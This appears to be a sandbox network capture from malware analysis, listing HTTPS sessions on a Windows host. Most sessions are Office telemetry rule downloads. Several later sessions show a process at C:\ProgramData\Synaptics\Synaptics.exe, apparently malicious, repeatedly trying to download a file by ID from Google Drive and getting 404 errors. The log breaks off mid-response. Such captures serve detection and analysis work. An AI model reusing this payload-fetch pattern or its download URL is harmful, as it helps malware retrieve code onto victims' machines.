                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        31 | 192.168.2.5 | 49779 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:25 UTC | 192 | OUT | GET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:26 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 407
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                        ETag: "0x8DC582B9698189B"
                                                                                        x-ms-request-id: 864f0b94-901e-00a0-42cc-456a6d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215026Z-1746fd949bdnq7x2hC1EWRpxr0000000032g00000000p7dz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:26 UTC | 407 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        32 | 192.168.2.5 | 49786 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:28 UTC | 192 | OUT | GET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:28 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:28 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                        x-ms-request-id: 16655d81-601e-0084-07c4-456b3f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215028Z-1746fd949bdkw94lhC1EWRxuz400000003cg00000000rxtm
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:28 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        33 | 192.168.2.5 | 49784 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:28 UTC | 192 | OUT | GET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:28 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:28 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 469
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                        ETag: "0x8DC582BBA701121"
                                                                                        x-ms-request-id: b5189c33-801e-008c-34cb-457130000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215028Z-1746fd949bdqpttnhC1EWRe1wg000000033g000000003kbz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:28 UTC | 469 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        34 | 192.168.2.5 | 49787 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:28 UTC | 192 | OUT | GET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:28 UTC | 471 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:28 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 464
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                        x-ms-request-id: 2e94baaf-201e-005d-6b5f-47afb3000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215028Z-1746fd949bd5gpk5hC1EWR8dk400000000u0000000003haz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_MISS
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:28 UTC | 464 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        35 | 192.168.2.5 | 49788 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:28 UTC | 192 | OUT | GET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:28 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:28 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 494
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                        x-ms-request-id: 9b0204ab-501e-0047-62c1-45ce6c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215028Z-1746fd949bd77mkmhC1EWR5efc00000003pg00000000003c
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:28 UTC | 494 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        36 | 192.168.2.5 | 49785 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:28 UTC | 192 | OUT | GET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:29 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:29 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 477
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                        x-ms-request-id: de914170-201e-0000-68ad-45a537000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215029Z-1746fd949bddtfvqhC1EWRxbpg000000034g00000000t6eq
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:29 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        37 | 192.168.2.5 | 49793 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:29 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SlBZz9ZyVuPJktLdd7Iatg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        38 | 192.168.2.5 | 49794 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:29 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SiAUGKHZnR0-21ja0fTyCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        39 | 192.168.2.5 | 49795 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:30 UTC | 192 | OUT | GET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:30 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:30 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                        ETag: "0x8DC582B9748630E"
                                                                                        x-ms-request-id: e2fa4791-901e-0029-7295-46274a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215030Z-1746fd949bdjrnwqhC1EWRpg2800000003f00000000006t3
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:30 UTC | 419 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        40 | 192.168.2.5 | 49796 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:30 UTC | 192 | OUT | GET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:30 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:30 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                        x-ms-request-id: dbf7ebc2-101e-00a2-0ac7-459f2e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215030Z-1746fd949bdnq7x2hC1EWRpxr0000000034g00000000c9x9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:30 UTC | 472 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        41 | 192.168.2.5 | 49797 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:30 UTC | 192 | OUT | GET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:30 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:30 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 404
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                        x-ms-request-id: 1e40fce6-401e-0078-1bd2-454d34000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215030Z-1746fd949bddtfvqhC1EWRxbpg00000003300000000125zm
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:30 UTC | 404 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        42 | 192.168.2.5 | 49798 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:30 UTC | 192 | OUT | GET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:30 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:30 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                        x-ms-request-id: 76d3483c-401e-00a3-2bcc-458b09000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215030Z-1746fd949bdfg4slhC1EWR34t0000000037g000000004850
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:30 UTC | 468 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        43 | 192.168.2.5 | 49800 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:31 UTC | 192 | OUT | GET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:31 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:31 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 428
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                        x-ms-request-id: c29bf332-501e-00a0-0ccb-459d9f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215031Z-1746fd949bdb8xvchC1EWRmbd400000003ag000000001sw0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:31 UTC | 428 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        44 | 192.168.2.5 | 49803 | 142.250.181.129 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:31 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                                                                                        2024-12-05 21:50:32 UTC | 1246 | IN | HTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qH4YQ2Pvljzm-jI3woo2MQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC4MOWu-6nP2OGgwDAAZwYwzhaZ1Hc7DoGBK3pT36XBruN0NmvathgaJ95c2oWHedJb9dr0
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:32 UTC | 144 | IN
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404
                                                                                        2024-12-05 21:50:32 UTC | 1390 | IN
                                                                                        Data Ascii: (Not Found)!!1</title><style nonce="TfrLKbnafYZU7biZJF9qXQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padd
                                                                                        2024-12-05 21:50:32 UTC | 118 | IN
                                                                                        Data Ascii: ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        45 | 192.168.2.5 | 49804 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:31 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-WLdSXUhO5AdPsjVFhMLkqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        46 | 192.168.2.5 | 49805 | 142.250.181.129 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:31 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                                                                                        2024-12-05 21:50:33 UTC | 1253 | IN | HTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
